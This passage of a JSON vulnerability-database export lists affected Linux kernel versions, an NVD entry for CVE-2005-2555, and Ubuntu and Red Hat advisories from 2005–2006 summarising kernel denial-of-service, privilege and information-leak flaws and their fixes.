"cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:pre10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:55", "description": "Linux kernel 2.6.x does not properly restrict socket policy access to users with the CAP_NET_ADMIN capability, which could allow local users to conduct unauthorized activities via (1) ipv4/ip_sockglue.c and (2) ipv6/ipv6_sockglue.c.", "edition": 3, "cvss3": {}, "published": "2005-08-16T04:00:00", "title": "CVE-2005-2555", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-2555"], "modified": "2018-10-19T15:33:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:debian:debian_linux:3.1", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.8.1.5", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.6.11_rc1_bk6", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:2.6.8.1", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.11.3"], "id": "CVE-2005-2555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2555", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:k7_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:686_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:386:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:686:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:amd64_k8_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:powerpc:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:power3:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:k7:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:power4:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:power4_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:amd64:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:amd64_xeon:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:power3_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11_rc1_bk6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:powerpc_smp:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:amd64_k8:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T19:39:47", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-3858", "CVE-2005-3805", "CVE-2005-3807", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-3808", "CVE-2005-3857"], "description": "Rudolf Polzer reported an abuse of the 'loadkeys' command. By \nredefining one or more keys and tricking another user (like root) into \nlogging in on a text console and typing something that involves the \nredefined keys, a local user could cause execution of arbitrary \ncommands with the privileges of the target user. The updated kernel \nrestricts the usage of 'loadkeys' to root. (CVE-2005-3257)\n\nThe ptrace() system call did not correctly check whether a process \ntried to attach to itself. A local attacker could exploit this to \ncause a kernel crash. (CVE-2005-3783)\n\nA Denial of Service vulnerability was found in the handler that \nautomatically cleans up and terminates child processes that are not \ncorrectly handled by their parent process (\"auto-reaper\"). The check \ndid not correctly handle processes which were currently traced by \nanother process. A local attacker could exploit this to cause a kernel \ncrash. (CVE-2005-3784)\n\nA locking problem was discovered in the POSIX timer cleanup handling \non process exit. A local attacker could exploit this to cause the \nmachine to hang (Denial of Service). This flaw only affects \nmultiprocessor (SMP) systems. (CVE-2005-3805)\n\nA Denial of Service vulnerability was discovered in the IPv6 flowlabel \nhandling code. By invoking setsockopt(IPV6_FLOWLABEL_MGR) in a special \nway, a local attacker could cause memory corruption which eventually \nled to a kernel crash. (CVE-2005-3806)\n\nA memory leak was discovered in the VFS lease handling. These \noperations are commonly executed by the Samba server, which led to \nsteady memory exhaustion. By repeatedly triggering the affected \noperations in quick succession, a local attacker could exploit this to \ndrain all memory, which leads to a Denial of Service. (CVE-2005-3807)\n\nAn integer overflow was discovered in the \ninvalidate_inode_pages2_range() function. By issuing 64-bit mmap calls \non a 32 bit system, a local user could exploit this to crash the \nmachine, thereby causing Denial of Service. This flaw does not affect \nthe amd64 platform, and does only affect Ubuntu 5.10. (CVE-2005-3808)\n\nOllie Wild discovered a memory leak in the icmp_push_reply() function. \nBy sending a large amount of specially crafted packets, a remote \nattacker could exploit this to drain all memory, which eventually \nleads to a Denial of Service. (CVE-2005-3848)\n\nChris Wrigth found a Denial of Service vulnerability in the \ntime_out_leases() function. By allocating a large number of VFS file \nlock leases and having them timeout at the same time, a large number \nof 'printk' debugging statements was generated at the same time, which \ncould exhaust kernel memory. (CVE-2005-3857)\n\nPatrick McHardy discovered a memory leak in the ip6_input_finish() \nfunction. A remote attacker could exploit this by sending specially \ncrafted IPv6 packets, which would eventually drain all available \nkernel memory, thus causing a Denial of Service. (CVE-2005-3858)", "edition": 5, "modified": "2005-12-23T00:00:00", "published": "2005-12-23T00:00:00", "id": "USN-231-1", "href": "https://ubuntu.com/security/notices/USN-231-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-09T19:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2457", "CVE-2005-2099", "CVE-2005-2548", "CVE-2005-2098", "CVE-2005-2459", "CVE-2005-2456", "CVE-2005-2458", "CVE-2005-2555"], "description": "David Howells discovered a local Denial of Service vulnerability in \nthe key session joining function. Under certain user-triggerable \nconditions, a semaphore was not released properly, which caused \nprocesses which also attempted to join a key session to hang forever. \nThis only affects Ubuntu 5.04 (Hoary Hedgehog). (CAN-2005-2098)\n\nDavid Howells discovered a local Denial of Service vulnerability in \nthe keyring allocator. A local attacker could exploit this to crash \nthe kernel by attempting to add a specially crafted invalid keyring. \nThis only affects Ubuntu 5.04 (Hoary Hedgehog). (CAN-2005-2099)\n\nBalazs Scheidler discovered a local Denial of Service vulnerability in \nthe xfrm_compile_policy() function. By calling setsockopt() with an \ninvalid xfrm_user policy message, a local attacker could cause the \nkernel to write to an array beyond its boundaries, thus causing a \nkernel crash. (CAN-2005-2456)\n\nTim Yamin discovered that the driver for compressed ISO file systems \ndid not sufficiently validate the iput data. By tricking an user into \nmounting a malicious CD-ROM with a specially crafted compressed ISO \nfile system, he could cause a kernel crash. (CAN-2005-2457)\n\nIt was discovered that the kernel's embedded zlib compression library \nwas still vulnerable to two old vulnerabilities of the standalone zlib \nlibrary. This library is used by various drivers and can also be used \nby third party modules, so the impact varies. (CAN-2005-2458, \nCAN-2005-2459)\n\nPeter Sandstrom discovered a remote Denial of Service vulnerability in \nthe SNMP handler. Certain UDP packages lead to a function call with \nthe wrong argument, which resulted in a crash of the network stack. \nThis only affects Ubuntu 4.10 (Warty Warthog). (CAN-2005-2548)\n\nHerbert Xu discovered that the setsockopt() function was not \nrestricted to privileged users. This allowed a local attacker to \nbypass intended IPSec policies, set invalid policies to exploit flaws \nlike CAN-2005-2456, or cause a Denial of Service by adding policies \nuntil kernel memory is exhausted. Now the call is restricted to \nprocesses with the CAP_NET_ADMIN capability. (CAN-2005-2555)\n\nThe Ubuntu 5.04 kernel update also fixes a memory leak in the \"md\" \n(Software RAID) driver which eventually lead to kernel memory \nexhaustion. Ubuntu 4.10 is not affected by this. \n(<http://bugs.debian.org/317787>)", "edition": 5, "modified": "2005-08-19T00:00:00", "published": "2005-08-19T00:00:00", "id": "USN-169-1", "href": "https://ubuntu.com/security/notices/USN-169-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-09T17:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3272", "CVE-2005-3273", "CVE-2005-3275", "CVE-2005-3274", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3055", "CVE-2005-3271", "CVE-2005-3276"], "description": "", "edition": 5, "modified": "2005-11-22T00:00:00", "published": "2005-11-22T00:00:00", "id": "USN-219-1", "href": "https://ubuntu.com/security/notices/USN-219-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:29", "bulletinFamily": "unix", "cvelist": ["CVE-2002-2185", "CVE-2004-1057", "CVE-2005-2708", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3044", "CVE-2005-3180", "CVE-2005-3275", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-3857", "CVE-2005-3858"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the security issues\r\ndescribed below:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate)\r\n\r\n- a flaw in remap_page_range() with O_DIRECT writes that allowed a local\r\nuser to cause a denial of service (crash) (CVE-2004-1057, important)\r\n\r\n- a flaw in exec() handling on some 64-bit architectures that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-2708, important)\r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges \r\n(CVE-2005-2709, moderate)\r\n\r\n- a flaw in IPv6 network UDP port hash table lookups that allowed a local\r\nuser to cause a denial of service (hang) (CVE-2005-2973, important)\r\n\r\n- a flaw in 32-bit-compat handling of the TIOCGDEV ioctl that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-3044, important)\r\n\r\n- a network buffer info leak using the orinoco driver that allowed\r\na remote user to possibly view uninitialized data (CVE-2005-3180, important)\r\n\r\n- a flaw in IPv4 network TCP and UDP netfilter handling that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-3275, important)\r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important)\r\n\r\n- a flaw in network ICMP processing that allowed a local user to cause\r\na denial of service (memory exhaustion) (CVE-2005-3848, important)\r\n\r\n- a flaw in file lease time-out handling that allowed a local user to cause\r\na denial of service (log file overflow) (CVE-2005-3857, moderate)\r\n\r\n- a flaw in network IPv6 xfrm handling that allowed a local user to\r\ncause a denial of service (memory exhaustion) (CVE-2005-3858, important)\r\n\r\nAll Red Hat Enterprise Linux 3 users are advised to upgrade their kernels\r\nto the packages associated with their machine architecture and\r\nconfigurations as listed in this erratum.", "modified": "2017-07-29T20:32:35", "published": "2006-01-19T05:00:00", "id": "RHSA-2006:0140", "href": "https://access.redhat.com/errata/RHSA-2006:0140", "type": "redhat", "title": "(RHSA-2006:0140) kernel security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "cvelist": ["CVE-2002-2185", "CVE-2004-1058", "CVE-2004-1073", "CVE-2005-0124", "CVE-2005-0400", "CVE-2005-0815", "CVE-2005-2458", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3275", "CVE-2005-3806"], "description": "The Linux kernel handles the basic functions of the operating system. \r\n\r\nThese new kernel packages contain fixes for the security issues described\r\nbelow:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate) \r\n\r\n- a race condition that allowed local users to read the environment\r\nvariables of another process (CVE-2004-1058, low)\r\n\r\n- a flaw in the open_exec function of execve that allowed a local user to\r\nread setuid ELF binaries that should otherwise be protected by standard\r\npermissions. (CVE-2004-1073, moderate). Red Hat originally reported this\r\nflaw as being fixed by RHSA-2004:504, but a patch for this issue was\r\nmissing from that update.\r\n\r\n- a flaw in the coda module that allowed a local user to cause a denial of\r\nservice (crash) or possibly gain privileges (CVE-2005-0124, moderate)\r\n\r\n- a potential leak of kernel data from ext2 file system handling\r\n(CVE-2005-0400, low) \r\n\r\n- flaws in ISO-9660 file system handling that allowed the mounting of\r\nan invalid image on a CD-ROM to cause a denial of service (crash)\r\nor potentially execute arbitrary code (CVE-2005-0815, moderate) \r\n\r\n- a flaw in gzip/zlib handling internal to the kernel that may allow a\r\nlocal user to cause a denial of service (crash) (CVE-2005-2458, low) \r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges\r\n(CVE-2005-2709, moderate) \r\n\r\n- a flaw in IPv6 network UDP port hash table lookups that allowed a local\r\nuser to cause a denial of service (hang) (CVE-2005-2973, important) \r\n\r\n- a network buffer info leak using the orinoco driver that allowed a remote\r\nuser to possibly view uninitialized data (CVE-2005-3180, important) \r\n\r\n- a flaw in IPv4 network TCP and UDP netfilter handling that allowed a\r\nlocal user to cause a denial of service (crash) (CVE-2005-3275, important) \r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important) \r\n\r\nThe following bugs were also addressed: \r\n\r\n- Handle set_brk() errors in binfmt_elf/aout\r\n\r\n- Correct error handling in shmem_ioctl\r\n\r\n- Correct scsi error return\r\n\r\n- Fix netdump time keeping bug\r\n\r\n- Fix netdump link-down freeze\r\n\r\n- Fix FAT fs deadlock\r\n\r\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their kernels\r\nto the packages associated with their machine architectures and\r\nconfigurations as listed in this erratum.", "modified": "2018-03-14T19:25:57", "published": "2006-02-01T05:00:00", "id": "RHSA-2006:0191", "href": "https://access.redhat.com/errata/RHSA-2006:0191", "type": "redhat", "title": "(RHSA-2006:0191) kernel security update", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:12", "bulletinFamily": "unix", "cvelist": ["CVE-2002-2185", "CVE-2004-1190", "CVE-2005-2458", "CVE-2005-2709", "CVE-2005-2800", "CVE-2005-3044", "CVE-2005-3106", "CVE-2005-3109", "CVE-2005-3276", "CVE-2005-3356", "CVE-2005-3358", "CVE-2005-3784", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-3857", "CVE-2005-3858", "CVE-2005-4605"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the security issues\r\ndescribed below:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate)\r\n\r\n- a flaw which allowed a local user to write to firmware on read-only\r\nopened /dev/cdrom devices (CVE-2004-1190, moderate) \r\n\r\n- a flaw in gzip/zlib handling internal to the kernel that may allow a\r\nlocal user to cause a denial of service (crash) (CVE-2005-2458, low) \r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges\r\n(CVE-2005-2709, moderate)\r\n\r\n- a flaw in the SCSI procfs interface that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-2800, moderate)\r\n\r\n- a flaw in 32-bit-compat handling of the TIOCGDEV ioctl that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-3044, important)\r\n\r\n- a race condition when threads share memory mapping that allowed local\r\nusers to cause a denial of service (deadlock) (CVE-2005-3106, important)\r\n\r\n- a flaw when trying to mount a non-hfsplus filesystem using hfsplus that\r\nallowed local users to cause a denial of service (crash) (CVE-2005-3109,\r\nmoderate)\r\n\r\n- a minor info leak with the get_thread_area() syscall that allowed\r\na local user to view uninitialized kernel stack data (CVE-2005-3276, low) \r\n\r\n- a flaw in mq_open system call that allowed a local user to cause a denial\r\nof service (crash) (CVE-2005-3356, important)\r\n\r\n- a flaw in set_mempolicy that allowed a local user on some 64-bit\r\narchitectures to cause a denial of service (crash) (CVE-2005-3358, important)\r\n\r\n- a flaw in the auto-reap of child processes that allowed a local user to\r\ncause a denial of service (crash) (CVE-2005-3784, important)\r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important)\r\n\r\n- a flaw in network ICMP processing that allowed a local user to cause\r\na denial of service (memory exhaustion) (CVE-2005-3848, important)\r\n\r\n- a flaw in file lease time-out handling that allowed a local user to cause\r\na denial of service (log file overflow) (CVE-2005-3857, moderate) \r\n\r\n- a flaw in network IPv6 xfrm handling that allowed a local user to\r\ncause a denial of service (memory exhaustion) (CVE-2005-3858, important) \r\n\r\n- a flaw in procfs handling that allowed a local user to read kernel memory\r\n(CVE-2005-4605, important)\r\n\r\nAll Red Hat Enterprise Linux 4 users are advised to upgrade their kernels\r\nto the packages associated with their machine architectures and\r\nconfigurations as listed in this erratum.", "modified": "2017-09-08T12:09:45", "published": "2006-01-17T05:00:00", "id": "RHSA-2006:0101", "href": "https://access.redhat.com/errata/RHSA-2006:0101", "type": 